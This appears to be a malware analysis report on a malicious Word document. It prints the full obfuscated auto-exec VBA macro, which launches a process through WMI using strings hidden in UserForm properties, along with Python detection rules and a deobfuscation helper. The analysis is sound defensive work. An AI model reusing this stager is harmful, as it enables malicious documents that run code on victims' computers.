Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 8e9d6ebfc1fd69a2…

MALICIOUS

Office (OLE) / .DOC

Size: 175.5 KB
Created: 2020-08-22 05:01:00
Authoring application: Microsoft Office Word
First seen: 2026-06-17
MD5: c9384d7754ef88228fb61f67c598bed1
SHA-1: ba0caf5415feb9aa061caa90b6090c1c60b0b26b
SHA-256: 8e9d6ebfc1fd69a2df5c0688489b12c4cff6ca6534a9a54dd504439071209734
Risk score: 230

Heuristics 7

  • ClamAV: Doc.Malware.Generic-9443669-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-9443669-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Gbn0eq_s1_j = Split _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. In this sample the pairing is also visible in the extracted source below: the Document_open entry point in the ThisDocument module and the CreateObject calls in the N6yhc60tpif3av3 module.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI carried by Office files; it identifies a schema, is not a host the document contacts, and is not an indicator on its own.
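The two macro heuristics above (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER and OLE_VBA_PCODE_AUTOEXEC_EXEC) are described in prose only. The following Python is an added illustration of that logic written for this page; it is not the report's own detection engine. The token lists are copied from the rule descriptions, the whole-token matching and the requirement that the stager rule see all of its features together are this example's own choices, and the three sample streams are constructed (the first is the extracted macro reduced to its load-bearing lines).

```python
"""Added illustration of the two macro heuristics above. Written for this
page, not the report's own engine; the token lists come from the rule
descriptions and every stream below is constructed."""
import re

AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
        "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
        "ShellExecute", "ExecuteExcel4Macro")
HIDDEN_PROPS = ("ControlTipText", "Tag", "Pages", "HelpContextId")


def _present(tokens, text):
    """Whole-token, case-insensitive search (VBA identifiers are
    case-insensitive, so Document_open must match Document_Open).
    A dot may follow a token so WinHttp.WinHttpRequest still counts."""
    low = text.lower()
    return [t for t in tokens
            if re.search(r"(?<![\w.])" + re.escape(t.lower()) + r"(?!\w)", low)]


def pcode_autoexec_exec(stream):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC: fires only when an auto-exec entry point
    AND an execution token co-occur in the same stream text."""
    a, e = _present(AUTOEXEC, stream), _present(EXEC, stream)
    return {"hit": bool(a and e), "autoexec": a, "exec": e}


def userform_hidden_stager(source):
    """OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER shape: auto-exec entry point,
    CreateObject() applied to a bare variable (not a string literal),
    Split and Join both used, and a read of a hidden UserForm property."""
    obj = re.search(r"CreateObject\(\s*([A-Za-z_]\w*)\s*\)", source)
    split_join = (re.search(r"\bSplit\b", source, re.I)
                  and re.search(r"\bJoin\s*\(", source, re.I))
    props = [p for p in HIDDEN_PROPS if re.search(r"\.\s*" + p + r"\b", source)]
    hit = bool(_present(AUTOEXEC, source) and obj and split_join and props)
    return {"hit": hit,
            "object_from_variable": obj.group(1) if obj else None,
            "properties": props}


# Constructed streams: the extracted macro reduced to its load-bearing lines,
# plus two single-token controls that must NOT fire the co-occurrence rule.
STAGER = """Private Sub Document_open()
N6yhc60tpif3av3.G8ckn1_ynwje
End Sub
Function G8ckn1_ynwje()
S7l7nx5ys3ewqfbpqq = Iu2754usl_7i(Nb869ttdha_th)
Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
Z_8lva3zukndfi4 = N6yhc60tpif3av3.X_e_6vag4hceo.ControlTipText
N3beqaaluk5l = N6yhc60tpif3av3.Co85rnvxwegz.Tag
Gbn0eq_s1_j = Split _
(N_b0owfw3wdoftjcu, "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]")
Qirwj3f_53uatijr2y = Qigom96ruohpd + Join(Gbn0eq_s1_j, I5xyri0uz6ifvciit)
End Function
"""
ONLY_AUTOEXEC = 'Private Sub Document_Open()\nMsgBox "hello"\nEnd Sub\n'
ONLY_EXEC = 'Sub Helper()\nSet o = CreateObject("Scripting.FileSystemObject")\nEnd Sub\n'

if __name__ == "__main__":
    for name, s in (("stager", STAGER), ("autoexec-only", ONLY_AUTOEXEC),
                    ("exec-only", ONLY_EXEC)):
        print(name, pcode_autoexec_exec(s), userform_hidden_stager(s)["hit"])
```

Running the block shows the co-occurrence rule firing on the reduced stager stream only: the entry point alone and the CreateObject of a literal ProgID alone both stay silent, which is the false-positive control the rule description promises. The stager check additionally insists that CreateObject take a variable rather than a quoted ProgID, since that is the feature that separates this decoded-moniker pattern from ordinary automation macros.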

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10212 bytes
SHA-256: 3deb0690cea8bbe223c6bb4e009d6dba41baeb01c72dea50af699d9370ffa5ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Jlowf8dwgkuu9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
N6yhc60tpif3av3.G8ckn1_ynwje
End Sub


Attribute VB_Name = "N6yhc60tpif3av3"
Attribute VB_Base = "0{6C3E871F-38B0-4AD5-AD34-9AB8C762A84E}{B493A0CB-2283-4FED-9888-31E00276724D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function G8ckn1_ynwje()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Yldxehrsmq8 = N6yhc60tpif3av3.BorderStyle + 100
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
U9x98mqrmtrjf1xvx = ChrW(Yldxehrsmq8 + (15))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Nb869ttdha_th = "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]i15df qhs1g 2[s55da znb183b]nm15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]gm15df qhs1g 2[s55da znb183b]t15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]" + U9x98mqrmtrjf1xvx + "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]:15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]in15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]315df qhs1g 2[s55da znb183b]215df qhs1g 2[s55da znb183b]_15df qhs1g 2[s55da znb183b]" + N6yhc60tpif3av3.W0ve0gyyqng + "15df qhs1g 2[s55da znb183b]ro15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]ce15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]"
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
S7l7nx5ys3ewqfbpqq = Iu2754usl_7i(Nb869ttdha_th)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Z_8lva3zukndfi4 = N6yhc60tpif3av3.X_e_6vag4hceo.ControlTipText
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Qcxj6b7sfu9_z = H8omhzh5k3vyn5nnq + (S7l7nx5ys3ewqfbpqq + U9x98mqrmtrjf1xvx + N6yhc60tpif3av3.V25hagsfcrg0xg.ControlTipText + Z_8lva3zukndfi4)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Vhvplmhl7f0epe = Qcxj6b7sfu9_z + N6yhc60tpif3av3.W0ve0gyyqng
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set Ut00f0vi7vuv64d = V0kppmyn9s42z_eq(Vhvplmhl7f0epe)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Pjg768ctdny3_o = Array(Ez1izc4ciquli9 + "Og2zuiwocsk P6ft4gkgfxf2o4h9Hv6wb4sak5gvkx Kohhd92f9399b_l2", P_fw0mv2yd10.Create(N3y0qafq8lxrgzcr, R038qcubyss, Ut00f0vi7vuv64d), Dw6_omaw_6tuq + "Vd7qb_df8l750myfpp V5fc9xxlfa5q Muiqghrtj01u Ooy95pdlxcz")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function V0kppmyn9s42z_eq(Aki1vbyg91o)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set V0kppmyn9s42z_eq = CreateObject(Aki1vbyg91o)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
V0kppmyn9s42z_eq.showwindow = Y4oz9ec7ynp + G_h01u6qt4c
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function Iu2754usl_7i(Sw5_2mcvub49)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N_b0owfw3wdoftjcu = Trim(Conversion.CVar((Sw5_2mcvub49)))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Gbn0eq_s1_j = Split _
(N_b0owfw3wdoftjcu, "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Qirwj3f_53uatijr2y = Qigom96ruohpd + Join(Gbn0eq_s1_j, I5xyri0uz6ifvciit)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Iu2754usl_7i = Qirwj3f_53uatijr2y
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function N3y0qafq8lxrgzcr()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N3beqaaluk5l = N6yhc60tpif3av3.Co85rnvxwegz.Tag
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N3y0qafq8lxrgzcr = Iu2754usl_7i(N3beqaaluk5l)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
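Reader-side reconstruction of the decoder, added here as an illustration and not part of the report's analysis pipeline. Nearly every statement in the extracted module is followed by three no-op For/DoEvents loops; the first helper strips that padding so the real statements can be read in order. The second helper replays Iu2754usl_7i (Trim, Split on the delimiter assembled from "15d"+"f qhs"+"1g 2[s55"+"da znb"+"183b]", Join) on the Nb869ttdha_th literal, which is transcribed below with D standing for the repeated delimiter text. Two characters are not in the extracted source and are modelled as parameters: U9x98mqrmtrjf1xvx, computed as ChrW(BorderStyle + 100 + 15), and the UserForm value W0ve0gyyqng. The join separator I5xyri0uz6ifvciit and the prefix Qigom96ruohpd are never assigned in the extracted module, so the example assumes they behave as empty strings (the usual Empty-Variant behaviour; it is exposed as the joiner argument so the assumption can be changed). The fragments visible on the page spell "winmgmt?:win32_?rocess", which is the shape of a WMI moniker for the Win32_Process class; the three-argument .Create call and the showwindow assignment in V0kppmyn9s42z_eq are consistent with Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation) and the ShowWindow property of Win32_ProcessStartup. The command line itself comes from Co85rnvxwegz.Tag, which is not on the page, and nothing about it is reconstructed here.

```python
"""Added reader-side helpers for the extracted macro above (not part of the
report's tooling): strip the DoEvents padding loops, then replay the
Split/Join string decoder on the literal assigned to Nb869ttdha_th."""
import re

# Padding block repeated throughout the macro: a seed assignment, a For loop
# whose body only accumulates the counter and calls DoEvents, then Next.
_PADDING = re.compile(
    r"^[ \t]*(\w+) = \d+[ \t]*\r?\n"
    r"[ \t]*For (\w+) = \d+ To \d+[ \t]*\r?\n"
    r"[ \t]*\1 = \1 \+ \2[ \t]*\r?\n"
    r"[ \t]*DoEvents[ \t]*\r?\n"
    r"[ \t]*Next \2[ \t]*\r?\n",
    re.MULTILINE,
)


def strip_padding(vba_source):
    """Remove the no-op loops so the real statements can be read in order."""
    return _PADDING.sub("", vba_source)


# Delimiter exactly as Iu2754usl_7i assembles it from five literals.
D = "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]"


def decode(s, joiner=""):
    """Replay Iu2754usl_7i: Trim, Split on D, Join. joiner="" is the ASSUMED
    value of the never-assigned separator I5xyri0uz6ifvciit; the prefix
    Qigom96ruohpd is likewise unassigned and treated as ""."""
    return joiner.join(s.strip().split(D))


def runtime_char(border_style):
    """U9x98mqrmtrjf1xvx = ChrW(BorderStyle + 100 + 15).
    fmBorderStyleNone = 0 gives 's', fmBorderStyleSingle = 1 gives 't'."""
    return chr(border_style + 100 + 15)


# The three string literals of the Nb869ttdha_th assignment, transcribed with
# D standing for each occurrence of the delimiter text.
SEG_A = D + D + "w" + D + "i" + D + "nm" + D + D + "gm" + D + "t" + D + D
SEG_B = D + D + ":" + D + "w" + D + "in" + D + D + "3" + D + "2" + D + "_" + D
SEG_C = D + "ro" + D + D + "ce" + D + "s" + D + "s" + D


def recover_moniker(border_style=0, form_prop="?"):
    """Rebuild S7l7nx5ys3ewqfbpqq. form_prop is a placeholder for
    N6yhc60tpif3av3.W0ve0gyyqng, a UserForm value absent from the source."""
    raw = SEG_A + runtime_char(border_style) + SEG_B + form_prop + SEG_C
    return decode(raw)


# Constructed excerpt of G8ckn1_ynwje: three padding blocks between real lines.
SAMPLE = """Function G8ckn1_ynwje()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
Yldxehrsmq8 = N6yhc60tpif3av3.BorderStyle + 100
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
U9x98mqrmtrjf1xvx = ChrW(Yldxehrsmq8 + (15))
Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
End Function
"""

if __name__ == "__main__":
    print(strip_padding(SAMPLE))
    print(recover_moniker(0))          # winmgmts:win32_?rocess
    print(recover_moniker(0, "P"))     # what a single-letter form value yields
```

The recovered skeleton leaves the one form-supplied character as "?" on purpose; substituting a guess would be claiming something the extracted source does not contain. To finish the reconstruction, dump the UserForm storage (for example with oletools' olevba or a raw OLE stream reader) and feed the real W0ve0gyyqng, ControlTipText and Tag values into recover_moniker and decode.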